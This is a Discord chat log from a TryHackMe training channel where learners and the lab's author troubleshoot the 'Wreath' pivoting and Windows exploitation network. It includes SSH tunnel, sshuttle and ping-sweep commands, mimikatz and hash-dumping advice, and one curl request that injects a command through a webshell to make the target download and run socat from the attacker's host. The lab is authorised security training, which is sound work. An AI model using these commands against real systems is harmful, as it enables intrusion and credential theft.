#wreath-network

I would stick that in the cleanup script too, but it usually requires a restart

just drop all incoming connections, best av ever

haha

i mean

not false

or find a way to reverse-connect and forkbomb the network 😂

speaking of

does the network have any forkbomb protection lmao

Would you please leave my poor network alone? smh

its fun and im almost done and awesome job 🙂

someone should find a way to upload static java files to the dev network so that the 100 ppl can play minecraft together

yos

added to to do list

thats one way to assert dominance over the network

hijacks network and moves all resources towards minecraft server

thats also one way to get banned

plzdontbanme

aaaaand

woooooooooooo

Ayeeee

soooo epic

thanks so much ❤️

All that effort for someone to reset it/ for you to get kicked out after 10 days

Did you enjoy it?

haha

yes

a lot

Also, good luck hosting a minecraft server on those boxes -- they have virtually no resources

We need to get a Wreath feedback page setup somewhere

Purely for my ego

https://i.imgur.com/C4VTuPE.png

even firefox doesnt wanna go

😂

haha

challenge accepted

No wonder -- you're proxying it through a box that quite literally can't access anything other than .100 and .200

no i just closed openvpn

lmao

and closed sshuttle and chisel

sshuttle is truly amazing

ya

network is run on t2.micros right?

Combination. .200 is a t2 micro, .100 and .200 are t2 smalls

muiri, if you make another network you should make it pivoting hell with a couple of hosts running a bunch of docker instances

lmao

hmm

2gb with 1vcpu? pfft

thats enough for minecraft

hehe

doubt it, considering they're the windows hosts

watch me

go on then, i dare you

hmm

wellllll

i think its possible

me, activating troll behaviour? idk what you're talking about

@merry robin will i get banned if i try 😂

Muiiiiiiir let's make the thing

yes make the thing

and the stuff

Probably

Which one?

pivoting hell with a couple of hosts running a bunch of docker instances

We've discussed a few things like that 😁

aw ):

fine

well nonetheless awesome network

thanks a lot

Take that @jagged lion

i would do throwback but im cheap

😂

fwiw I prefer wreath to holo/throwback

Wreath is a really nice primer for pivoting and windows exploitation

yeeep

Wha

Especially with it being free content, it's really good and pretty well explained.

and definitely something you can speedrun in a day lol

They aren't telling me to go kill myself after doing my network 😁

I mean

hey, they didn't do holo

hey i want to die can i have early holo access please

Holo is really designed to show unique and obscure topics and attacks rather than comb over the basics

True, but the testers are going to murder Cry sooner or later

I think wreath does a good job of going over the basics well

Wait, what?

Cry

Did you just... compliment me?

dawg

Holo has me so tired

woah

I'm crying. That's the nicest thing you've ever said to me

lmao

I’ve been rewriting Spooky’s bs for the past 4 days

Better quote it before he takes it back

Funny. He's been saying the same thing about your content 😆

So the testers might not crucify us

Too late

I don’t know all the complaints I’ve seen have been about his sections so

Got Esqy building a cross as his latest woodworking project in preparation

lmao

Honestly

spooks and I aren’t good at explaining basic shit

we’re more specialists in a sense

Specialists at what?

lmao

im gonna leave before this turns into a murder scene 👀

same

Oh, don't worry -- we do this all the time 😆

It's all fun

👀

Cry learned it the hard way from Throwback

haha

i wanna do throwback but i dont want to pay

Don’t worry spooks and I stab each other at least 30 times a day

rlly

Those two are honestly like an old married couple

I assume it has only gotten worse over time, so only surprise is that they dont stab each other even more

in hindsight, maybe i shouldnt have finished it so fast now i have to wait lol

🤷

Hi guys. anyway i can do wreath withouth 7 day streak. i just want to practice pivoting to supplement for my study. Thanks for suggestion in advance.

not if you dont subscribe

I have the subscription.

You can join using the sub 🙂

then you dont need streak

Roger, Thanks very much both of you guys.

Np 🙂
Enjoy the network!

enjoy!!

Thank you again.

Hey, I added <IP> thomaswreath.thm to my hosts file and firefox is giving me a unable to locate error. Any ideas?

I tried clearing my history anc cache.

Could you screenshot your hosts file for me? 🙂

Nm, I made a mistake when I wrote the IP.

Ah, fair 🙂

allo all. hey with wreath, after getting onto the first box i can't reach back to my attacking machine

is this expected? e.g. as root on the webserver I can't ping, or pivot via a reverse proxy etc back to my attack machine

Are you using the AttackBox?

yup

Did you start the VPN manually?

nope. attack box said it wasn't necessary?

Good. What IP are you trying to connect back to?

the one listed on the my machine page for reverse proxys

but even writing that i figure i know what im doing wrong

I really should add a note for that

Yeah, you need to tunnel IP

guessing a vpn interface on the attack box yeah

Yep

my bad, thanks man

Np 🙂

Added a note into the network for it

@merry robin found more ports on task 5 question 1 than the answer

oh wait one is closed me dumb dumb

Chances are that's someone not bothering to read the task and opening ports below 15000

Unless it was just the one?

I installed Empire today and think they might have changed the location of scripts - from /opt/Empire/data/module_source/situational_source/network/
to
/opt/Empire/data/module_source/situational_awareness/network
(only realised because I copy pasted command initially from guide)

As I said before me dumb dumb

At this point, I'm convinced that the editor is trolling me

oh, you did have that location later in the documentation anyway

That's about the fifth time I've had to fix that

I think it's currently fine I just didn't read everything

ugh

its been situational_awareness for a while

muiri is tripping out

True

haha

@merry robin is there any benefit for doing a ICMP for loop with /dev/tcp vs the ping command with -c number of pings?

/dev/tcp does raw TCP requests, ping does ICMP echo requests?

Where's this?

task 9

trying to get the command submit to work

Ah, I getcha

So:

for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep "bytes from" &); done```

You're asking why do that instead of using /dev/tcp?

reading the answer blanks no wonder

Hm?

trying to enter the /dev/tcp/ one

I, uh, am thoroughly confused right now 😆

The ping sweep is used as a rudimentary way to see if hosts are up. The /dev/tcp one is used to check if TCP ports are open on a single host

Or within a nested loop, for multiple hosts, if you're a masochist

# this is how I have done it
for i in $(seq 1 255); do ping -c 1 -W 1 10.10.10.$i | grep 'from'; done

So, that'll be a lot slower as it's not backgrounded, but it's a similar principle

Updating the directories again just for you 😉

have you used fping Muriri?

Please don't 🤣

even though that's never installed on remote machines... ahahah

Yeah, as part of coursework a while back. Used to form custom packets, right?

you mean hping3

Oh, no, different program

That's the one

ya

Then nope -- I have not used fping

Looks useful though

I can't fix one problem without creating a new one for you lol

Hahaha

Great work on the network by the way, really enjoyed playing around on it

Good to hear 😁

Kudos to @merry robin for creating the network. I just finished my labs for the pwk oscp and this network is solid. Great work.

You'll find that all three main teaching sections can be mapped into PWK sections -- Pivoting, Empire, and AV evasion. Albeit taught very differently 😄

about to do the PWK, so this is awesome 👍

@merry robin You don't know but you're god! Started with Wreath, already loving it. So much of learning!

how do you guys make the pictures on the end look so clean!!! After all the text.

To connect to wreath I've to connect to the wreath network? Not the machines right?

yeah connect to the wreath network then you should be able to nmap the first machine

Thanks

Possible that someone has changed the root password on the initial box as the hash isnt accepted as a flag 🙄

Make sure your answer begins with $6$ ends with ad1, you might be copying too much.

The current hash doesnt end with ad1

Someone has probably changed it 🤦‍♂️

Ouch, best bet would be to try and get a reset through. You might be able to report it as well by sending an email to support, not sure if they can/will handle this.

If you're on 10.200.72.x then it's unlikely as like 100 people got thrown into that network

Are the votes done dynamically? Like do you always need half of the network to vote? So in the dev's network case 50... rather than 5?

I think so. Not 100%

Can we share the report publicly ?

same question

50???
Jesus, it can't be over thirty, right?

It was 23 last I checked, on 72

While gunzip chisel windows it says unexpected End of file

And we need to download latest binary? Or the v1.7.3

@young roost yep, by all means :)
The specific format (PDF shared in something like Google Drive) will obviously make it a bit more difficult unless you embed the PDF in a website or something, but go for it! I've already asked for no spoiling the checkpoints in task 44, so try to avoid that though.
That and obviously only the correct format is actually getting into the writeups section 😆

Sounds like you downloaded the HTML page

Latest will be fine 🙂

Thanks

Nope... coz the Linux one got gunzipped

Do file on the download?

Empty

That'll be why it's not gunzipping then. Try downloading it again

Thanks

Oh...now I got the reason the file was not getting downloaded because it states this file contains a virus or malware

Why are you downloading it on your host?

It's on my kali

Vm

You're running AV... on your Kali?

Probably chrome being a pain tbh

Oh, you're downloading it from the browser, I see

Yes

Thanks anyway for the help

Yeah, try downloading it with wget, or tell the browser to stop being a pain 🙂

I'm having trouble downloading the vpn file for the wreath network. I keep getting a 404 error page...

@strange bison what's the fix for that one? Regenerate, wait 10 seconds, download?

1 whole minute

Up to 2 or so really

Okay. @daring pine click regenerate, wait two minutes, then try

ah, facing the same issue waited for like 10 minutes ;-;

If that doesn't work, let me know

Still kinda stuck on the 404...

still 404

@limber rover are you able to check what's happening? Anything to do with that new code?

(Or @fiery ingot seeing as you're online and VPNs are usually yours :) )

ashu goes offline

I'm also stuck on the 404 error after attempting to download the config file...

Yo guys. I make all steps for persistence in starkiller/empire.
Open ports via firewall
unzip files and phps
but i can't get callback git-serv
I tried that as well via cli empire

usemodule .... / shell whoami

execute

no callback although
sshuttle active
evil-winrm works

any suggestions?

@humble sluice looks like they are calling back, but are dying?

looks like
when i typed at least one command

they are coloured red

For the config file... I had to wait way longer than 5 minutes... That should work.

Yeah -- I think that's the bug in Empire, although I haven't seen the starkiller interface for it when it happens.
The wonderful CX0IN has a fix for it, but it hasn't been pushed to production yet @Embargo#7344

Goddamn android Discord doesn't like mentions

@humble sluice

xD

@dense tundra did you get it working?

i will need empire in further network solution,

?

i scared that

@humble sluice nah -- the Empire section is technically optional 🙂

Well worth doing though

wooh

kudos !

Hey, can you give me an IP of a machine on the network?

Yes. It's ok now.

The goal was to teach as many different techniques as possible. Empire is awesome, and you could do the whole network with it, but for learning it's good to get as wide a range of experiences as possible imo

Awesome 🙂

10.200.104.200

Try regenerating now?

I'm still getting 404's. Does the attackbox work against the wreath network?

You don't need to download the VPN config to the attackbox

It connects automatically

^^

Although you should still be able to download your config file.

I tried pinging the ip on the attackbox, but I'm not getting a response

Maybe I did something wrong, I'll try again tomorrow bc I already terminated the attackbox and I can't start it again until tomorrow

It doesn't connect automatically for non-subs

oh, is there an extra step then or I just can't?

You need to copy the config across

Then activate it normally

Ah ok

Huh, ok

if im using socat in task 21, would it be a fork or a relay i should use?

@lusty glade why use socat in task 21?

My pip is pointing to python3.8 so whenever I command python2 -m pip install it says no module named pip

sorry task 20 i mean

@surreal sail ah, have a look at the get-pip.py script. Just search for that online, download the script, then run it with python2

Okay

@lusty glade which do you think it might be?

It needs 3.6 or above version

@surreal sail change the shebang to use python3 and go through adding brackets around all the print statements

As in, if it was print "Exploit" make it print("Exploit")

That's literally all you have to do to convert that one

Yes I know thanks btw

relay i'd guessing but can't get the syntax correct

Relay, yep 🙂

What syntax are you using?

trying to follow how it was done in the socat section in task 13

then sending my reverse shell through burp but i dont get a connection

Looks good to me

Did you adjust the firewall on .200?

hmmm no lol 🙃

probably the issue

That'd do it 😄

do i need to do the ncat step as well or just having the socat relay running?

Yes, you need to have a listener running locally

lmfaoooooooooooooooooo ok i got it now thanks

Awesome 🙂

I am not able to scan my network any idea what might be the problem. I regenerated my .ovpn as well but same problem.

@haughty sun what exactly are you trying to do? :)

I am at the enumeration stage trying to scan the machine.

Which machine?

Wreath Network I mean

There are three machines on the Wreath network.
Which stage are you at?

Web server one

Can you ping it?

And what IP is it showing for you?

The ip is 10.200.100.200. the thing is when I ping it takes some time to response

Are you using the AttackBox?

No

Could you show me the output of ip a?

One minute please

still getting the 404

Same... I can't get hold of the proper config file... Took me a while to realise it downloaded the normal one...

It's still a problem for you both?

yep. I waited for around half an hour now after pressing regenerate

again 404

Hm

@limber rover I reckon the 503s might be more of a problem, but just if you get a chance to look at it, the network config download is still borked by the looks of it. Not sure what you did earlier to get it working for YeaHacked 😄

CF enabled, hopefully in the next few weeks we'll have migrated our infra which will stop those from occuring

Stop the 404s?

Or the 503s?

got redirected to some cloudfare and then back to 404 ;-;

503*

What VPN server is this? For Wreath?

yes

rest is okay

just wreath

Please give me an IP of a machine on the network you're on (shown on the network visual map in the room)

10.200.104.200

i got a problem

when i am going to download the ovpn file for the wreath network i get redirected to 404

Please give me an IP of a machine on the network you're on (shown on the network visual map in the room)

let me look into this one - it looks like this is the same server from earlier that was having issues.

oka

Please try regenerating your config now.

10.200.104.200

Ah you're both on the new OpenVPN server - I think the issue is fixed, so please try regenerating.

still cant download the config file

stating error 404

Did you regenerate, or just click download?

i regenerated already

Did you try regenerating inthe last few minutes?

just regenerated now and still not working

Okay, will investigate:)

yes

still doesn't work

at first i thought my internet is not working properly

Ah - thats weird. Something isn't right with that network.

@surreal sail & @fiery bay please try regenerating your config again:)

We've found the error and have fixed the problem.

The patch should be on the kali repo as of this morning. Just make sure everyone is on 3.8.1

Oh you beauty. Thank you!
Is it available in the main Empire repo?

The main repo isn't updated yet, still working out the merge conflicts for going back and fixing 3.7

Faiiir. The latest version of Empire I'm seeing in the repo is also 3.8.0 by the way

Did you run a git update? But it could also take a bit for the repo to pull down the published version on their gitlab.

Not a git update no -- I did an apt update then upgraded the powershell-empire package.
I'll give it a go in a couple of hours and see if they've synced it 😁

Lol need more coffee... Meant apt update

Haha -- don't worry, been there 😆

I'm still getting the problem!

Please give me an IP of a machine on the network you're on (shown on the network visual map in the room)

10.200.104.200

Ah that one has been fixed, did you try regenerating your config?

I did yeah

I can try again however

Still 404

Did anyone faced any problem while installing Empire? Module M2Crypto was not getting installed in my case

I have no idea what the 4 dots after the first one are unless it's all the -rNx options but that didn't work either task 15 question 2

Just the switch, and arguments for it

First of the 4 chars is a double quote mark

|| "-e"||

like that?

and -r after? idk

Whats your THM username?

No, long format flag

@strange bison oh though you wanted to include the sshuttle part with the -e flag

right...

thanks

I did say just the switch and arguments for it

-e is the short version of it

All the content in the room uses long form

So you could probably assume longform?

fair enough

just the switch and arguments with short form wouldn't fit

Can i get some help?

banned?

yeah

i just logged in in a while and saw that wreath has launched

and this appears when i clicked

@strange bison anyways thanks for the help like it so far. Will finish it today

not like room timeout errors just banned? I have no idea

yes just banned

@merry robin another banned user

Did you try to join before it was released?

i think so..

Like before today

Yeah... muir was banning people from the room for that

oh

One of the admins was banning people from the site for it so you were lucky

oh ohmy

so can i be unbanned or i ll stay like this?

I pinged Muir. Muir will sort it.

oh ok

TurtleBerry

There isn't an account with that username, are you sure its correct (and the case is right)?

Lower case b?

Are you installing it through kali with apt install powershell-empire or github?

Github

Should be okay now:)

That package can sometime cause some trouble. I'd give the kali install a shot. Especially since they are getting early access to a newer version with a few more features. If you are still running into install problems, you can always reach out to us on our discord.
https://discord.com/invite/P8PZPyf

Thanks will give that a try tomorrow morning

I panic when I see a discord link NGL

Hehe, that one is fine

Thank you, I will give it a try in a bit!

sorry lol I tried not to link it with the embedded thing but it cannot be turned off aparently

Cx01N, it's really great that you're working so closely with Muir on this. As someone who tested the network and was there for some of the dev, it's been a challenge but it's good to see bugs in the tool ironed out like this

Big thank you from me, and I'm sure the rest of the testers would back that

@strange bison Thanks! I know I hate it when tools dont work so we try hard to get those fixed pretty quickly

Hey, so i am getting a strange error on post exploitation on 2nd machine i addded my user to admins but i cant get mimikatz to work || it gives me a perm error and token elevate doesnt seem to be working either it shows token (Error : ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 )||

with privilege::debug?

What user are you using?

Are you using WinRM or RDP?

command prompt needs to be ran as admin too

rdp

ohhh okay but i taught we had to privillege debug and then token elevate

Then what blackdragon said, I would imagine

yess

You also have to do that

WHen does this get released?

ahh okay, Thanks a lot to you all for the help

It's to do with process integrity. An administrator doesn't necessarily execute processes as an administrator. Usually they do it with medium integrity -- same as a normal user

You need to execute command prompt explicitly as an administrator (as a high integrity process) before you have the Impersonate and Debug tokens available

As in, hard-released?

ahh okay, thanks a lot , I didnt know that 😄

is there any other port I need forward for evil-winrm to work. Trying to forward it and do localhost -p <port-number> fails and evil win-rm over proxychains dyanmic ssh tunnel fails confused

Are you using an SSH port forward through .200?

@merry robin I can get rdesktop to work fine

that's about it

shuttle and dynamic ssh forward over proxychains works

have tried firewall rules and local forward winrm to localhost on a different port just times out

What have you used to pivot @lilac ibex?
Are you setting up an SSH port forward to 5985 via .200?

||ssh -D proxyport -i id_rsa root@10.200.92.200 proxychains evil-winrm -u user -p password -i 10.200.92.150||

oh that didn't format right

and || ssh -L 1234:10.200.92.150:5985 -i id_rsa root@10.200.92.200 ||

Now, those both look right to me

What errors was evil-winrm giving you?

is there a 4th command I'm missing for the a net user part?

auth failed

That would indicate that the user isn't in the "Remote Management Users" group

OR that you're getting the password wrong

But yeah, the actual proxying is working fine

if there are not in remote management

wouldn't RDP fail aswell?

or does that not apply

RDP accepts Administrator or Remote Desktop Users groups

So either of those will have access

There's something funky about WinRM and administrator

From memory it's that you can only use it as an administrator if you've already logged in once normally / via RDP

Something like that

Otherwise you need the Remote Management Users group explicitly defined

command failed while trying to do web command injection... no wonder

lkadjfdak;lsfjads;klf

@merry robin thanks

will write that down

Np!

Somebody else get a permission denied when trying to connect with root ssh to the network?

@outer thunder what's the command

sometimes I have to restart my ovpn connection for some reason

even though the network is still up

no idea why

|| ssh -i id_rsa root@<ip> ||

and chmod the key

Is this channel new? I just noticed it

Yes changed with 600

@outer thunder

1. the network died and f5 the page will see it's off
   0r
2. restarting your ovpn connection will fix the issue for some reason
3. i have no idea after that

@sly spear ya free thm network is out

Which network are you on?

@lilac ibex thanks i will try it with my open vpn 🙂

And can you screenshot the error?

Sweet! Thanks

np ;'..;' 👍 just need a 7 day streak or sub to do it

@outer thunder any luck while I wait for this to download...[progress-bar...]

@merry robin this is my error message

ssh -i id_rsa root@10.200.95.200
Load key "id_rsa": invalid format
root@10.200.95.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).

id_rsa key is broken

That looks suspiciously like someone might have changed the key

or that

Could you do me a favour: disconnect from the VPN and DM me your connection pack @outer thunder?

The authorized_keys file is literally chattr +i'd to discourage people from doing that, but, some people are trolls

@merry robin if the file exist with the correct key. Does chattr prevent ssh-key from working?

Nah -- works fine through it

Just stops people from overwriting it, and chattr is less well known than chmod

ya chattr doesn't allow anyone to modify it including root. Just wondered if I missed something important

"if you change the key I will hunt you down" - problem solved

Tbf, I am quite happy to ban people if I see them trolling 🤷‍♂️

It's a free network -- not like they're paying to be in there

Ergo it's a privilege, not a right

@merry robin anyways has anyone tried to do a shell over rdp with pth-winexe doesn't seem like it works

IIRC that's working via SMB?
SMB isn't exposed on either of those boxes, so it shouldn't do

pth-winexe needs 445 to work?

not trying psexec

Yep, but it has to get in somehow

I think this is in my PWK notes. Lemme check

Oh, wait

Samba

So yes, it's working via SMB

As far as I can tell, winexe is actually basically the psexec build for Linux

The impacket psexec.py just being an alternative

ah then why is it always talked about as RDP...

I’ve never heard of that tool hmmmm, probably because the latest system it supports is 2003

Oh, no idea, but it's definitely nothing to do with RDP. There are ways to PTH with RDP (xfreerdp has an option for it), but winexe doesn't take advantage of that

@hard mortar can you confirm that?

pth-winexe hangs to

grrr

It does Windows NT as well

heck you no ask me

seems like thy are the same thing

yes you can pth from rdp

or im doing it wrong

Because you just told me you'd never heard of it!

winexe != pth

pth-winexe won't work either if SMB isn't open

There's a tool called winexe, and there's a tool called pth-winexe

smb not open sage

Two separate binaries, and yes, it's weird

but the same thing?

ls -al no symbolic link kek

Yeah, they're doing the same thing, just one of them does it with PTH and one of them is just an equivalent to PSexec

pth via rdp doesn't work in like 99% of situations for whatever reason

Why those couldn't go into one binary, I don't know

Some obscure registry setting

yup

pth-winexe is super slow vs psexec

But no, it was the winexe working over SMB that I was asking you to confirm

That's correct, yes?

seems like it

Oi, Spooky 😆

Right, that's literally what I sent a minute ago 🤣

Thanks Spooky ♥️

I'd say so

kek, but is there any shell rdp only port program I have never heard about?

im no expert tho

Right, you literally are the Windows expert around here

But yeah, that was my conclusion too

I am?

Oh God

RDP is graphical by nature

So, I wouldn't imagine so

but shell so copy paste is more fun

That's where WinRM comes in

what is smb and winrm are both closed?

if SMB is closed, your PC is borked.

Then you hope that RDP is open

Tbf, it's firewalled in both of those Windows machines -- just by default

remember, filtered vs closed is different

Surely if you have all the sharing off then SMB is closed?

Although it shouldn't technically be. Just because Windows doesn't classify AWS networks properly

By that definition wreath is broken

Think it's still actually open, iirc

Wreath is less broken than holo™️

Just nothing being shared

surprisingly, no, you need to go disable several services

@strange bison can I access that right now?

Holo?

No

D:

And think yourself lucky for it

Holo is a wee bit brokey

netlogon, lanmanclient, and lanmanserver

To answer this question though, if you don't have SMB (with admin credentials), or WinRM (with a user allowed to access it), or RDP, then you're hoping that there's a vulnerable service / webapp

Otherwise you ain't getting in

D:

Kinda the equivalent of SSH being closed on Linux

fair but still D:

Hey, be glad I specifically allowed WinRM in the firewall

when port 80 is the only port open

Then the fun begins 😁

is there a good way to do reverse socks proxy with dynamic ssh tunnels windows machine -> first box?

I think I used chisel

Although I think I needed a relay?

trying chisel thinking how to do it with ssh

not sure how to do the last pivot will figure it out later

ah

@merry robin still the problem isn't solved

404

;--;-----;

Uh...

( @limber rover, sorry, pinging again ^^)

ah, i restarted my router and regenerated it and it downloaded it

thanks anyways

Sounds like a cache thing there 🙂

In task 17 it is mentioned that we cannot perform a service scan on the target without setting up a proxy, is that because we use a portable version of nmap or what?

Yea, it doesn't have the service version scan supported. I think it explains why if you try with the static nmap?

Yes, it says that couldn't find the nse_main script

Yeah -- static nmap doesn't include all the Lua scripts that make up the NSE 🙂

How long should it take this to run? || sshuttle -r root@10.200.1.200 --ssh-cmd "ssh -i id_rsa" 10.200.1.0/24 -x 10.200.1.200 ||

keeps timing out

Virtually instant, but I can almost guarantee that's the wrong subnet

10.200.1.x is not assigned afaik

^

We have 10.200.2.* onwards for wreath

.2?

The first one is .72, no?

it is

I derped

thank you!

Hehe, np!

Enjoy!

Oh wait -- maybe not .2 I think and a few subnets above are throwback (honest it's so easy to mix up when using the CLI LMAO)

Yeah, Holo and Throwback are on 10.200 as well, I know that

but yeah -- 10.200.1.* defo isn't assigned for anything like that atm (:

glad you know more than me Muirl 😄

c : Connected to server.
🙂

Although Wreath with 40 networks will be taking up a nice big chunk of the upper section now 😆

Ayeeeeee

Well done

proxies confuse me but I'm figuring it out. First network haha

just follows muiri's instructions they are really clear

You'll get this!

Let me know if there's anything I can make clearer in the network 🙂

Yeah it was mainly with the foxy proxy, thought I was supposed to set the ip to the device I was connecting to .150 instead of .200 so I kept trying to navigate there and got redirected to my dns setup earlier. Everything has been very clear, thanks!!

It happens!

@merry robin @fair breach can one of you check the 72 network, it stopped and after restarting I can't get connected

Lemme check real quick

Aye yeah everything is stopped aside from the VPN for it @woven warren. Boxes launched 3 hours ago (20.16:12 GMT) but shutdown 16 mins ago (23:50:00 GMT)

This is what I see after refreshing the page

That network is really packed, more networks have been created - if you leave and rejoin the room you should be put into another less-busy network.

thanks

Thanks @limber rover (:

up on the 99 network, now to re-exploit

Glad to hear it. Hopefully it isn't too much of a pain

We're still trying to see how best to scale it etc hence why it isn't "officially" released etc

Never know until you try right? No matter the testing

Thanks for including shebangs, that's pretty cool.

I have some pretty good notes, that is making it quick, plus some of the stuff is the same

Wicked to hear. Teething problems since networks is such a new thing to THM

I am enjoying it so far

From working on it on the backend as much as I have it seems great. Muirl's done an absolute superb job. I just haven't had the chance to fully go through it (as in complete the network)

but I think it really teaches some important concepts/topics super well

yup, up to task 40

Set the IP to the correct target for your choice of pivoting technique. If you used sshuttle or one of the proxying techniques then this will just be the IP of the target.

Is the target the one my proxy connection the server is setup with or the target I am attacking with the exploit

Task 19

target is the host you want to exploit

sshuttle just helps facilitate the connection

I see, it makes sense now.

this intended??

That is not a static binary

Where did you get it from?

my host

Then that'll be why

haha ok.

When a binary is compiled it's usually dynamic (meaning it relies on other libraries of shared code on the system)

You have to outright tell the compiler to create a static binary if you want it to function entirely independently

gotcha....well i figured my nc binary would work...thats not either

For the same reason

same library erro

ok...

Use the links in the task to download static copies

RTFM == win always

Heh, they're definitely not just there to look pretty 😆

@merry robin can i know if i can be unbanned from Wreath please?

Is the target up? 👀 I was able to reach it yesterday, but can't right now. I've verified that I have a valid tun0 IP - but the target isn't pingable/nmapable today for some reason 🤔

10.200.72.x?

Are you not the guy who did about 30 questions in it before I banned you?

nope

You sure?

i think i click only on start

yea

Nothing for 10.200.72.200

My streaked dropped to 0 today as I couldn't get the pivoting working yesterday, not sure if that's related? I'm a subscriber though 🤔

Because I distinctly remember giving someone the link, thinking they had joined, being pleased that they were working on it, then checking the profile and realising it wasn't a British account, but rather, a Romanian account with four letters starting with V @coarse zealot

Not ring any bells?

umm

Once you have access, you have access permanently 🙂

Are you on the .72 subnet?
If so, leave and rejoin.

leave the room and rejoin, I was having issues with that network earlier

i didn't do many questions as i remember

That's the dev subnet

1 or 2

My tun0 is 10.50.x.x

Essentially a bunch of people got shoved into it by accident

Is the first IP 10.200.72.200?

Hey anybody knows how to fix this , empire when using the hopping listener

so no chance of unbanning ? :((

$ ping 10.200.72.200
PING 10.200.72.200 (10.200.72.200) 56(84) bytes of data.
From 10.50.73.1 icmp_seq=1 Destination Host Unreachable

My tun0: 10.50.73.x/24

I mean, it sounds distinctly like you're
A) Lying to try getting unbanned and
B) Not acknowledging the infraction in the first place

Leave and rejoin

i don't remember, but thanks anyways

*sigh*
I've asked the admins to unban everyone, full disclosure

It's obviously not been done yet though

You have left the room.
Should I download a new ovpn file too? 👀

Yeah, rejoin then download a new config file 🙂

That... Good question

Um, @fervent obsidian?

Weird Python error message

Yes, its driving me insane

Installed empire through github

Thanks; I just rejoined with tun0 being 10.50.101.x/24 now

Looks like PING 10.200.72.200 (10.200.72.200) 56(84) bytes of data. just hangs indefinitely now unfortunately

you should have gotten a new network

You're on a different subnet now

I thought there might have been a more explicit 'rejoin' for the room, but it just kept my old state around for some reason

10.200.100.x, I'd wager

i got .99

Nothing active on 10.200.72.* even then there's only one machine which is the .200 which doesn't seem to be the vpn server

which was stopped ~2/3 hours ago

Oh I lie

.250 is the VPN server

the VPN server for that is active but nothing else

I'm not seeing any transfer from my http server. Anyone know what I'm doing wrong? || curl -X POST http://10.200.72.150/web/exploit-Ferrari404.php -d "a=curl http://Tun0-IP/socat -o socat-Ferrari404 && chmod +x socat-Ferrari404" ||

which task is that for

Task 20

trying to setup the relay but not sure how to get socat onto the target

I went back to Task 13 on socat to try and figure it out

but no luck

if you use the SSHuttle that the guide recommends, you should be able to just use "upload" and "download" functionality with WinRM

anyone having issues with level 33 on wreath?? i have issues with the webpage displaying

Ah right, I did use sshuttle.. thank you.

@glacial monolith level 33?? i used shuttle too

No, I'm on 20

Thanks guys...learning that xfreerdp can map shares was worth the admission alone. Super fun and very real world materials...

Please can you tell me how you get this?? I finished the room but i didn't get this only the badge

You can download a certificate for a badge

For any badge)

From where please if you canhelp me

I'm not exactly sure how to do it but I know you can

I'm sure somebody else will be happy to help 😄

Actually here, on your public profile

Click "Share badge"

@native needle

Im trying

Thanks 🙏🙏🙏

@calm wedge

No worries 😄

Can I still access the Wreath network after finishing every question? Still would like to play with it.

Mhm

Wasn't sure if networks where completely different from normal machines. Even if I answer everything I can still access it. Right? should probably stop staying up so late...

You can, yeah 🙂
Keep in mind the "limited users at once" thing, but there's nothing wrong with having a play around with it for a bit afterwards 😄

@merry robin thanks also did you ever get no ports found from teh invoke-portscan command. Figured I would learn chisel in a chisel but it's slow as dirt

Huh. Nope, can't say I did. How strange.

returned ports with {}

Guys is crackmapexec detectable by anti-virus?????

no clue

@merry robin can i send you a screen shot dm of my pain?

Does anyone else keep periodically disconnecting from the wreath network? Seems to happen to me about every 5-10 mins :/

@half ledge like when you check your connection and the completed part is missing every 5-10 mins sometimes lasts longer than that

About to go for a shower, but sure

Well for some more context, I'm on the pivoting section of the room. But whenever I tried getting a shell during the exploitation section it randomly kept dropping the connection every now and then

@half ledge like you get a shell and 2 seconds later something breaks

Yeah sort of, it went fine for about a command or 4 and then it just freezes up the terminal as well iirc

After which I check the terminal running the ovpn connection where it start reconnecting, still not sure whether this is a me-problem or something with the room, i'm starting to lean towards the me-problem tho :p

at that point i just force ctrl-c and restart opvn real quick

waiting around seems like it takes longer but it drops ever now and again

not sure why, but it seems like Muriri is in the shower so we will never know

Just remembered, this also happens when I ssh into the public box ||(as root after getting the ssh key)||

other than it randomly crashing it seems like if the network doesn't sense anything even though it has time it will just turn itself off

can't tell if the network just ran out of time or there wasn't enough traffic to keep it going

@half ledge are you using the AttackBox?

Nope, my own kali VM, which is why I think this could as well be an issue on my end

Yeah, it sounds like a multiple VPN thing

Yeah I turned off my own (non-thm) VPN after a while as well, didn't change much sadly

I'm not really around to debug just now though I'm afraid. About to head into a meeting

Oh don't worry about it, I'm working as well, just figured I might as well get a head start on this for after work :p

windows defender is picking up some of my obsidian files as suspicious because of the notes i took/copy pasted commands? lol

Doesn't surprise me 😆

woohoo it is finished!

I'll try do a nice report and submit it as I want the practice, awesome room @Muiri I learned something new in every section, often multiple new things and I think cleared a lot of fog for me around AV Evasion and Exfiltration (impacket smbserver quite nice!)

thanks for putting that together

Hello all, I am still unable to download a new configuration file?
Any help would be great
I have redone a new configuration file and it is now working!

@normal salmon a question on task 33.

Kindly ping me when you're online

What's up?

Can I PM @merry robin

Does it need a DM?

I am having issues with the gitwebpage

Not sure what I'm doing wrongly

I will send screenshot

If you verify you can send it in here

!docs verify

@merry robin im back

chisel connection

Looks good

foxy proxy

Yep

still cant access the main git page or the reource page for auth

That's normal

Read the question -- what URI does it tell you to use

/resources

That's, uh, not the right machine

/resources is on .100

jeez i just got it thanks bro. so stupid of me

Hi guys.... I’m doing the wreath network... ran the exploit, everything going nicely until I set up the shell, putting the IP, port, then setting up the netcat listener in another window (nc -lvnp ....) no matter what port I choose, nothing happens.... I’ve tried at least 10 different ports. I’m typing the IP that TryHackMe gave me after connecting to the VPN network... also, I’m using my own distro, not the website attack box. What am I doing wrong? Could it be my internet connection that is crappy?

at the end and says the NT hash is wrong...

DM me the hash?

What OS are you using?

tried it with samdump2 kinda sucks

Pretty sure samdump2 is one of the ones that doesn't work on Windows 8/10

DM me the hash?

did it with impacket-script and it worked

Parrot

samdump2 not anything after 8 got it

There's a reason I've recommended the tools I did 😄
Well done getting it now!

I have no idea if there's a firewall running on Parrot by default. What IP are you using to connect back?

I just like figuring out how to do it in X ways so I can compare etc

Oh, 100%

There are others that still work IIRC

Gimme a sec, I have a few in my notes

?

The IP that TryHackMe gave me when I connected to the network VPN

It’s so frustrating because everything was going so well

creddump7
That's the one that works.
It's written in Python2 so is a bit iffy, but I believe Tib3rius has a fork that's been upraded

A 10.50 one, to confirm?

10.4.31.....

Ah, so that's the wrong VPN. That accesses the normal THM machines, but you need a special one for networks

